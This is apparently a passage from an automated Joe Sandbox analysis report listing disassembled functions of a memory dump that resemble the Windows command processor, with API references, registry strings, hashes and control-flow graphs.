                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: QueryValue$CloseOpensrandtime
                              • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                              • API String ID: 145004033-3846321370
                              • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                              • Instruction ID: e2b496c1e0d5a188fab7f3d922bdf882f674ab859588042ab8809fb3fd741c34
                              • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                              • Instruction Fuzzy Hash: 7DE1403251D682C6E750BF12E49057AF7A0FB84745F886135EE8E42A9CDF7CE944EB20
                              Function 00007FF744F137D8 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 269registrythreadmemoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 509 7ff744f137d8-7ff744f13887 GetCurrentThreadId OpenThread call 7ff744f104f4 HeapSetInformation RegOpenKeyExW 512 7ff744f1e9f8-7ff744f1ea3b RegQueryValueExW RegCloseKey 509->512 513 7ff744f1388d-7ff744f138eb call 7ff744f15920 GetConsoleOutputCP GetCPInfo 509->513 515 7ff744f1ea41-7ff744f1ea59 GetThreadLocale 512->515 513->515 519 7ff744f138f1-7ff744f13913 memset 513->519 517 7ff744f1ea5b-7ff744f1ea67 515->517 518 7ff744f1ea74-7ff744f1ea77 515->518 517->518 522 7ff744f1ea79-7ff744f1ea7d 518->522 523 7ff744f1ea94-7ff744f1ea96 518->523 520 7ff744f13919-7ff744f13935 call 7ff744f14d5c 519->520 521 7ff744f1eaa5 519->521 530 7ff744f1393b-7ff744f13942 520->530 531 7ff744f1eae2-7ff744f1eaff call 7ff744f03240 call 7ff744f28530 call 7ff744f14c1c 520->531 524 7ff744f1eaa8-7ff744f1eab4 521->524 522->523 526 7ff744f1ea7f-7ff744f1ea89 522->526 523->521 524->520 527 7ff744f1eaba-7ff744f1eac3 524->527 526->523 529 7ff744f1eacb-7ff744f1eace 527->529 534 7ff744f1ead0-7ff744f1eadb 529->534 535 7ff744f1eac5-7ff744f1eac9 529->535 532 7ff744f1eb27-7ff744f1eb40 _setjmp 530->532 533 7ff744f13948-7ff744f13962 _setjmp 530->533 538 7ff744f1eb00-7ff744f1eb0d 531->538 539 7ff744f139fe-7ff744f13a05 call 7ff744f14c1c 532->539 540 7ff744f1eb46-7ff744f1eb49 532->540 537 7ff744f13968-7ff744f1396d 533->537 533->538 534->524 541 7ff744f1eadd 534->541 535->529 543 7ff744f139b9-7ff744f139bb 537->543 544 7ff744f1396f 537->544 551 7ff744f1eb15-7ff744f1eb1f call 7ff744f14c1c 538->551 539->512 546 7ff744f1eb4b-7ff744f1eb65 call 7ff744f03240 call 7ff744f28530 call 7ff744f14c1c 540->546 547 7ff744f1eb66-7ff744f1eb6f call 7ff744f101b8 540->547 541->520 554 7ff744f1eb20 543->554 555 7ff744f139c1-7ff744f139c3 call 7ff744f14c1c 543->555 550 7ff744f13972-7ff744f1397d 544->550 546->547 565 7ff744f1eb87-7ff744f1eb89 call 7ff744f186f0 547->565 566 7ff744f1eb71-7ff744f1eb82 _setmode 547->566 558 7ff744f139c9-7ff744f139de call 7ff744f0df60 550->558 559 7ff744f1397f-7ff744f13984 550->559 551->554 554->532 570 7ff744f139c8 555->570 558->551 576 7ff744f139e4-7ff744f139e8 558->576 559->550 567 7ff744f13986-7ff744f139ae call 7ff744f10580 GetConsoleOutputCP GetCPInfo call 7ff744f104f4 559->567 577 7ff744f1eb8e-7ff744f1ebad call 7ff744f158e4 call 7ff744f0df60 565->577 566->565 586 7ff744f139b3 567->586 570->558 576->539 580 7ff744f139ea-7ff744f139ef call 7ff744f0be00 576->580 590 7ff744f1ebaf-7ff744f1ebb3 577->590 587 7ff744f139f4-7ff744f139fc 580->587 586->543 587->559 590->539 591 7ff744f1ebb9-7ff744f1ec24 call 7ff744f158e4 GetConsoleOutputCP GetCPInfo call 7ff744f104f4 call 7ff744f0be00 call 7ff744f10580 GetConsoleOutputCP GetCPInfo call 7ff744f104f4 590->591 591->577
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                              • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                              • API String ID: 2624720099-1920437939
                              • Opcode ID: e0d6314462040d9132af36def7bdcbd46fb0756625f4788b6d15f19097c8c1f5
                              • Instruction ID: d4c3b875bc8dc8eb9766b6721dfbb8eee31440c9fe925ca5db71a0a561b87f74
                              • Opcode Fuzzy Hash: e0d6314462040d9132af36def7bdcbd46fb0756625f4788b6d15f19097c8c1f5
                              • Instruction Fuzzy Hash: F1C19E31E0C642CAF714BF6294C55B8EAB1EF49754FCC4139DE4E46ADADE3CA840A720
                              Function 00007FF744F12978 Relevance: 9.1, APIs: 6, Instructions: 138COMMON
                              Download Yara Rule

                              Control-flow Graph

                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                              • Instruction ID: 4d23921d3bf5de036b7fae4249e554dbe89634a06411fb7383989b1f66660b30
                              • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                              • Instruction Fuzzy Hash: 78510A21B0C681C5EB30BF57A5842BAE6A0FB54BA0FCD4231DE6D576D8DF3CE845A210
                              Function 00007FF744F07D30 Relevance: 3.3, APIs: 2, Instructions: 252COMMON
                              Download Yara Rule
                              APIs
                              • memset.MSVCRT ref: 00007FF744F07DA1
                                • Part of subcall function 00007FF744F1417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF744F141AD
                                • Part of subcall function 00007FF744F0D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF744F0D46E
                                • Part of subcall function 00007FF744F0D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF744F0D485
                                • Part of subcall function 00007FF744F0D3F0: wcschr.MSVCRT ref: 00007FF744F0D4EE
                                • Part of subcall function 00007FF744F0D3F0: iswspace.MSVCRT ref: 00007FF744F0D54D
                                • Part of subcall function 00007FF744F0D3F0: wcschr.MSVCRT ref: 00007FF744F0D569
                                • Part of subcall function 00007FF744F0D3F0: wcschr.MSVCRT ref: 00007FF744F0D58C
                              • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF744F07EB7
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: wcschr$Heapmemset$AllocCurrentDirectoryProcessiswspace
                              • String ID:
                              • API String ID: 168394030-0
                              • Opcode ID: b5165ffa2db6ef7b8d8da3c0ab750a736ff1024e17944bcf39a6df9fca352c0d
                              • Instruction ID: ff0c229c50df02746e2f8114fbc4ecde33d7ca79c5c88c924c1824253a8cdb6a
                              • Opcode Fuzzy Hash: b5165ffa2db6ef7b8d8da3c0ab750a736ff1024e17944bcf39a6df9fca352c0d
                              • Instruction Fuzzy Hash: DAA1D321B1CA42C5FB64FF2798942B9A2A1AF84784FCC4135DE1E476EDDF3CA945A310
                              Function 00007FF744F14D5C Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 268memorylibraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 331 7ff744f14d5c-7ff744f14e4b InitializeCriticalSection call 7ff744f158e4 SetConsoleCtrlHandler _get_osfhandle GetConsoleMode _get_osfhandle GetConsoleMode call 7ff744f10580 call 7ff744f14a14 call 7ff744f14ad0 call 7ff744f15554 GetCommandLineW 342 7ff744f14e4d-7ff744f14e54 331->342 342->342 343 7ff744f14e56-7ff744f14e61 342->343 344 7ff744f14e67-7ff744f14e7b call 7ff744f12e44 343->344 345 7ff744f151cf-7ff744f151e3 call 7ff744f03278 call 7ff744f14c1c 343->345 351 7ff744f151ba-7ff744f151ce call 7ff744f03278 call 7ff744f14c1c 344->351 352 7ff744f14e81-7ff744f14ec3 GetCommandLineW call 7ff744f113e0 call 7ff744f0ca40 344->352 351->345 352->351 362 7ff744f14ec9-7ff744f14ee8 call 7ff744f1417c call 7ff744f12394 352->362 366 7ff744f14eed-7ff744f14ef5 362->366 366->366 367 7ff744f14ef7-7ff744f14f1f call 7ff744f0aa54 366->367 370 7ff744f14f21-7ff744f14f30 367->370 371 7ff744f14f95-7ff744f14fee GetConsoleOutputCP GetCPInfo call 7ff744f151ec GetProcessHeap HeapAlloc 367->371 370->371 373 7ff744f14f32-7ff744f14f39 370->373 376 7ff744f14ff0-7ff744f15006 GetConsoleTitleW 371->376 377 7ff744f15012-7ff744f15018 371->377 373->371 375 7ff744f14f3b-7ff744f14f77 call 7ff744f03278 GetWindowsDirectoryW 373->375 386 7ff744f14f7d-7ff744f14f90 call 7ff744f13c24 375->386 387 7ff744f151b1-7ff744f151b9 call 7ff744f14c1c 375->387 376->377 379 7ff744f15008-7ff744f1500f 376->379 380 7ff744f1507a-7ff744f1507e 377->380 381 7ff744f1501a-7ff744f15024 call 7ff744f13578 377->381 379->377 383 7ff744f150eb-7ff744f15161 GetModuleHandleW GetProcAddress * 3 380->383 384 7ff744f15080-7ff744f150b3 call 7ff744f2b89c call 7ff744f0586c call 7ff744f03240 call 7ff744f13448 380->384 381->380 397 7ff744f15026-7ff744f15030 381->397 390 7ff744f1516f 383->390 391 7ff744f15163-7ff744f15167 383->391 412 7ff744f150d2-7ff744f150d7 call 7ff744f03278 384->412 413 7ff744f150b5-7ff744f150d0 call 7ff744f13448 * 2 384->413 386->371 387->351 396 7ff744f15172-7ff744f151af free call 7ff744f18f80 390->396 391->390 395 7ff744f15169-7ff744f1516d 391->395 395->390 395->396 401 7ff744f15032-7ff744f15059 GetStdHandle GetConsoleScreenBufferInfo 397->401 402 7ff744f15075 call 7ff744f2cff0 397->402 405 7ff744f15069-7ff744f15073 401->405 406 7ff744f1505b-7ff744f15067 401->406 402->380 405->380 405->402 406->380 416 7ff744f150dc-7ff744f150e6 GlobalFree 412->416 413->416 416->383
                              APIs
                              • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F14D9A
                                • Part of subcall function 00007FF744F158E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF744F2C6DB), ref: 00007FF744F158EF
                              • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F14DBB
                              • _get_osfhandle.MSVCRT ref: 00007FF744F14DCA
                              • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F14DE0
                              • _get_osfhandle.MSVCRT ref: 00007FF744F14DEE
                              • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F14E04
                                • Part of subcall function 00007FF744F10580: _get_osfhandle.MSVCRT ref: 00007FF744F10589
                                • Part of subcall function 00007FF744F10580: SetConsoleMode.KERNELBASE ref: 00007FF744F1059E
                                • Part of subcall function 00007FF744F10580: _get_osfhandle.MSVCRT ref: 00007FF744F105AF
                                • Part of subcall function 00007FF744F10580: GetConsoleMode.KERNELBASE ref: 00007FF744F105C5
                                • Part of subcall function 00007FF744F10580: _get_osfhandle.MSVCRT ref: 00007FF744F105EF
                                • Part of subcall function 00007FF744F10580: GetConsoleMode.KERNELBASE ref: 00007FF744F10605
                                • Part of subcall function 00007FF744F10580: _get_osfhandle.MSVCRT ref: 00007FF744F10632
                                • Part of subcall function 00007FF744F10580: SetConsoleMode.KERNELBASE ref: 00007FF744F10647
                                • Part of subcall function 00007FF744F14A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14A28
                                • Part of subcall function 00007FF744F14A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14A66
                                • Part of subcall function 00007FF744F14A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14A7D
                                • Part of subcall function 00007FF744F14A14: memmove.MSVCRT(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14A9A
                                • Part of subcall function 00007FF744F14A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14AA2
                                • Part of subcall function 00007FF744F14AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F08798), ref: 00007FF744F14AD6
                                • Part of subcall function 00007FF744F14AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F08798), ref: 00007FF744F14AEF
                                • Part of subcall function 00007FF744F15554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF744F14E35), ref: 00007FF744F155DA
                                • Part of subcall function 00007FF744F15554: RegQueryValueExW.KERNELBASE ref: 00007FF744F15623
                                • Part of subcall function 00007FF744F15554: RegQueryValueExW.KERNELBASE ref: 00007FF744F15667
                                • Part of subcall function 00007FF744F15554: RegQueryValueExW.KERNELBASE ref: 00007FF744F156BE
                                • Part of subcall function 00007FF744F15554: RegQueryValueExW.KERNELBASE ref: 00007FF744F15702
                              • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F14E35
                              • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F14E81
                              • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F14F69
                              • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F14F95
                              • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F14FB0
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F14FC1
                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F14FD8
                              • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F14FF8
                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F15037
                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F1504B
                              • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F150DF
                              • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F150F2
                              • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F1510F
                              • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F15130
                              • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F1514A
                              • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F15175
                                • Part of subcall function 00007FF744F13578: _get_osfhandle.MSVCRT ref: 00007FF744F13584
                                • Part of subcall function 00007FF744F13578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F1359C
                                • Part of subcall function 00007FF744F13578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F135C3
                                • Part of subcall function 00007FF744F13578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F135D9
                                • Part of subcall function 00007FF744F13578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F135ED
                                • Part of subcall function 00007FF744F13578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F13602
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                              • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                              • API String ID: 1049357271-3021193919
                              • Opcode ID: d2460cf6989233a7a4462fbac63f5e4cbe638dcbee7ad3df93fe443bd3d09fd5
                              • Instruction ID: 03d9aaedc08acfec22c322b50f9be0f3f40846986ccbd84b7925b8d74c3fb341
                              • Opcode Fuzzy Hash: d2460cf6989233a7a4462fbac63f5e4cbe638dcbee7ad3df93fe443bd3d09fd5
                              • Instruction Fuzzy Hash: A4C15D21A0CA42D6EB00BF52A895179E7A0FF89B91FCD9134DD0E477D9DF3CA945A220
                              Function 00007FF744F13C24 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 289COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 420 7ff744f13c24-7ff744f13c61 421 7ff744f13c67-7ff744f13c99 call 7ff744f0af14 call 7ff744f0ca40 420->421 422 7ff744f1ec5a-7ff744f1ec5f 420->422 431 7ff744f1ec97-7ff744f1eca1 call 7ff744f1855c 421->431 432 7ff744f13c9f-7ff744f13cb2 call 7ff744f0b900 421->432 422->421 424 7ff744f1ec65-7ff744f1ec6a 422->424 426 7ff744f1412e-7ff744f1415b call 7ff744f18f80 424->426 432->431 437 7ff744f13cb8-7ff744f13cbc 432->437 438 7ff744f13cbf-7ff744f13cc7 437->438 438->438 439 7ff744f13cc9-7ff744f13ccd 438->439 440 7ff744f13cd2-7ff744f13cd8 439->440 441 7ff744f13cda-7ff744f13cdf 440->441 442 7ff744f13ce5-7ff744f13d62 GetCurrentDirectoryW towupper iswalpha 440->442 441->442 443 7ff744f13faa-7ff744f13fb3 441->443 444 7ff744f13fb8 442->444 445 7ff744f13d68-7ff744f13d6c 442->445 443->440 447 7ff744f13fc6-7ff744f13fec GetLastError call 7ff744f1855c call 7ff744f1a5d6 444->447 445->444 446 7ff744f13d72-7ff744f13dcd towupper GetFullPathNameW 445->446 446->447 448 7ff744f13dd3-7ff744f13ddd 446->448 450 7ff744f13ff1-7ff744f14007 call 7ff744f1855c _local_unwind 447->450 448->450 451 7ff744f13de3-7ff744f13dfb 448->451 461 7ff744f1400c-7ff744f14022 GetLastError 450->461 453 7ff744f140fe-7ff744f14119 call 7ff744f1855c _local_unwind 451->453 454 7ff744f13e01-7ff744f13e11 451->454 463 7ff744f1411a-7ff744f1412c call 7ff744f0ff70 call 7ff744f1855c 453->463 454->453 457 7ff744f13e17-7ff744f13e28 454->457 460 7ff744f13e2c-7ff744f13e34 457->460 460->460 464 7ff744f13e36-7ff744f13e3f 460->464 465 7ff744f14028-7ff744f1402b 461->465 466 7ff744f13e95-7ff744f13e9c 461->466 463->426 468 7ff744f13e42-7ff744f13e55 464->468 465->466 469 7ff744f14031-7ff744f14047 call 7ff744f1855c _local_unwind 465->469 470 7ff744f13e9e-7ff744f13ec2 call 7ff744f12978 466->470 471 7ff744f13ecf-7ff744f13ed3 466->471 475 7ff744f13e57-7ff744f13e60 468->475 476 7ff744f13e66-7ff744f13e8f GetFileAttributesW 468->476 487 7ff744f1404c-7ff744f14062 call 7ff744f1855c _local_unwind 469->487 479 7ff744f13ec7-7ff744f13ec9 470->479 473 7ff744f13f08-7ff744f13f0b 471->473 474 7ff744f13ed5-7ff744f13ef7 GetFileAttributesW 471->474 483 7ff744f13f0d-7ff744f13f11 473->483 484 7ff744f13f1e-7ff744f13f40 SetCurrentDirectoryW 473->484 481 7ff744f14067-7ff744f14098 GetLastError call 7ff744f1855c _local_unwind 474->481 482 7ff744f13efd-7ff744f13f02 474->482 475->476 485 7ff744f13f9d-7ff744f13fa5 475->485 476->461 476->466 479->471 479->487 490 7ff744f1409d-7ff744f140b3 call 7ff744f1855c _local_unwind 481->490 482->473 482->490 491 7ff744f13f13-7ff744f13f1c 483->491 492 7ff744f13f46-7ff744f13f69 call 7ff744f1498c 483->492 484->492 493 7ff744f140b8-7ff744f140de GetLastError call 7ff744f1855c _local_unwind 484->493 485->468 487->481 490->493 491->484 491->492 503 7ff744f140e3-7ff744f140f9 call 7ff744f1855c _local_unwind 492->503 504 7ff744f13f6f-7ff744f13f98 call 7ff744f1417c 492->504 493->503 503->453 504->463
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                              • String ID: :
                              • API String ID: 1809961153-336475711
                              • Opcode ID: ba32b8838d86428b32df37d2d44875712fc0c8ae3247368b5d273864595a39ba
                              • Instruction ID: d973879bed12015df72a4bba9b949f625cdeec3256fa404a73f32ec130896df1
                              • Opcode Fuzzy Hash: ba32b8838d86428b32df37d2d44875712fc0c8ae3247368b5d273864595a39ba
                              • Instruction Fuzzy Hash: 19D11C2260CB85C2EB64BF16E4952A9A7B1FB84750F884235DD8E426E9DF3CE944DB10
                              Function 00007FF744F12394 Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 213COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 602 7ff744f12394-7ff744f12416 memset call 7ff744f0ca40 605 7ff744f1241c-7ff744f12453 GetModuleFileNameW call 7ff744f1081c 602->605 606 7ff744f1e0d2-7ff744f1e0da call 7ff744f14c1c 602->606 611 7ff744f1e0db-7ff744f1e0ee call 7ff744f1498c 605->611 612 7ff744f12459-7ff744f12468 call 7ff744f1081c 605->612 606->611 618 7ff744f1e0f4-7ff744f1e107 call 7ff744f1498c 611->618 617 7ff744f1246e-7ff744f1247d call 7ff744f1081c 612->617 612->618 623 7ff744f12483-7ff744f12492 call 7ff744f1081c 617->623 624 7ff744f12516-7ff744f12529 call 7ff744f1498c 617->624 625 7ff744f1e10d-7ff744f1e123 618->625 623->625 632 7ff744f12498-7ff744f124a7 call 7ff744f1081c 623->632 624->623 628 7ff744f1e13f-7ff744f1e17a _wcsupr 625->628 629 7ff744f1e125-7ff744f1e139 wcschr 625->629 634 7ff744f1e17c-7ff744f1e17f 628->634 635 7ff744f1e181-7ff744f1e199 wcsrchr 628->635 629->628 633 7ff744f1e27c 629->633 642 7ff744f124ad-7ff744f124c5 call 7ff744f13c24 632->642 643 7ff744f1e2a1-7ff744f1e2c3 _wcsicmp 632->643 637 7ff744f1e283-7ff744f1e29b call 7ff744f1498c 633->637 638 7ff744f1e19c 634->638 635->638 637->643 641 7ff744f1e1a0-7ff744f1e1a7 638->641 641->641 645 7ff744f1e1a9-7ff744f1e1bb 641->645 651 7ff744f124ca-7ff744f124db 642->651 646 7ff744f1e1c1-7ff744f1e1e6 645->646 647 7ff744f1e264-7ff744f1e277 call 7ff744f11300 645->647 649 7ff744f1e1e8-7ff744f1e1f1 